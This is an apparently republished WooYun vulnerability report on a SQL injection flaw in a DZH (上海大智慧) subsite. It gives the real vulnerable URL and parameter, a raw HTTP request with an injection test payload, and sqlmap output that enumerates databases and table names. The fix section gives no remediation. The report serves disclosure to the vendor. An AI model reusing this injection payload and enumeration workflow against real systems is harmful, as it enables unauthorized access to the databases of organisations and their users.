上海大智慧分站存在SQL注入漏洞

141928
文章

2017年3月19日18:55:06评论313 views字数 200阅读0分40秒阅读模式

摘要

2016-03-17：细节已通知厂商并且等待厂商处理中
2016-03-17：厂商已经确认，细节仅向厂商公开
2016-03-27：细节向核心白帽子及相关领域专家公开
2016-04-06：细节向普通白帽子公开
2016-04-16：细节向实习白帽子公开
2016-05-01：细节向公众公开

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-185597

漏洞标题：上海大智慧分站存在SQL注入漏洞

漏洞作者： 1993*

提交时间： 2016-03-17 09:39

公开时间： 2016-05-01 13:09

漏洞类型： SQL注射漏洞

危害等级：低

自评Rank： 3

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

http://xxdl.gw.com.cn/marketIframe.jsp?currentPage=1160&search=&subtype=&type=0

GET /marketIframe.jsp?currentPage=1160&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20917%3d917 HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://xxdl.gw.com.cn:80/detail.jsp?type=4&id=68236

Cookie: JSESSIONID=8673A86409DE03DF88E08591E991033C

Host: xxdl.gw.com.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

用sqlmap跑

当前数据库

[*] starting at 00:43:15

[00:43:15] [INFO] parsing HTTP request from 'c:/123.txt'

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y

[00:43:15] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only v

[00:43:15] [INFO] resuming back-end DBMS 'microsoft sql server'

[00:43:15] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: http://xxdl.gw.com.cn:80/marketIframe.jsp?currentPage=1160&search=&subtype=&type=(SELECT CHAR(113)+CH

---

[00:43:17] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2005

[00:43:17] [INFO] fetching current database

[00:43:17] [INFO] resumed: newweb

current database: 'newweb'

[00:43:17] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/xxdl.gw.com.cn'

列取数据库

Parameter: #1* (URI)

Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: http://xxdl.gw.com.cn:80/marketIframe.jsp?currentPage=1160&se

---

[00:43:36] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2005

[00:43:36] [INFO] fetching database names

[00:43:36] [INFO] the SQL query used returns 10 entries

[00:43:36] [INFO] resumed: distribution

[00:43:36] [INFO] resumed: gwmis

[00:43:36] [INFO] resumed: gwmis_new

[00:43:36] [INFO] resumed: master

[00:43:36] [INFO] resumed: model

[00:43:36] [INFO] resumed: msdb

[00:43:36] [INFO] resumed: newweb

[00:43:36] [INFO] resumed: show

[00:43:36] [INFO] resumed: tempdb

[00:43:36] [INFO] resumed: userdb

available databases [10]:

[*] distribution

[*] gwmis

[*] gwmis_new

[*] master

[*] model

[*] msdb

[*] newweb

[*] show

[*] tempdb

[*] userdb

注入出来的表

Database: newweb

[64 tables]

+----------------------------+

| CustomerMessage |

| D99_CMD |

| D99_Tmp |

| MSpeer_lsns |

| MSpeer_request |

| MSpeer_response |

| MSpub_identity_range |

| article |

| bfb |

| blog |

| blogName |

| comments |

| dtproperties |

| exchangePredict |

| hny |

| hq |

| iMarket |

| iNews |

| iQihuo |

| intAd |

| jiangu |

| jiaozhu |

| news |

| otherMarket |

| peixun |

| ssgs |

| stockComments |

| stockPublic |

| stockQues |

| stockReform |

| syncobj_0x3033373734394136 |

| syncobj_0x3042433833433332 |

| syncobj_0x3043423337434134 |

| syncobj_0x3141424241323643 |

| syncobj_0x3230303031324631 |

| syncobj_0x3234383435423739 |

| syncobj_0x3238383132393033 |

| syncobj_0x3245333346333034 |

| syncobj_0x3342453142354135 |

| syncobj_0x3345363031453930 |

| syncobj_0x3441463130413937 |

| syncobj_0x3538343730414337 |

| syncobj_0x3642414238423243 |

| syncobj_0x3736343243424535 |

| syncobj_0x3745434545373742 |

| syncobj_0x3945314544464636 |

| syncobj_0x4235313841413833 |

| syncobj_0x4335354637313432 |

| syncobj_0x4535383145443832 |

| syncobj_0x4637313444463931 |

| syncobj_0x4642464233414431 |

| sysarticlecolumns |

| sysarticles |

| sysarticleupdates |

| sysextendedarticlesview |

| syspublications |

| sysreplservers |

| sysschemaarticles |

| syssubscriptions |

| systranschemas |

| tablespaceinfo |

| test |

| todayAOne |

| todayIntro |

+----------------------------+

具体就不深入了！

不是不会。

而是真的不会，但是漏洞确实存在的。

漏洞证明：

在上面！

修复方案：

你懂的！

版权声明：转载请注明来源 1993*@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-17 13:09

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-185597

漏洞标题： 上海大智慧分站存在SQL注入漏洞

相关厂商： 上海大智慧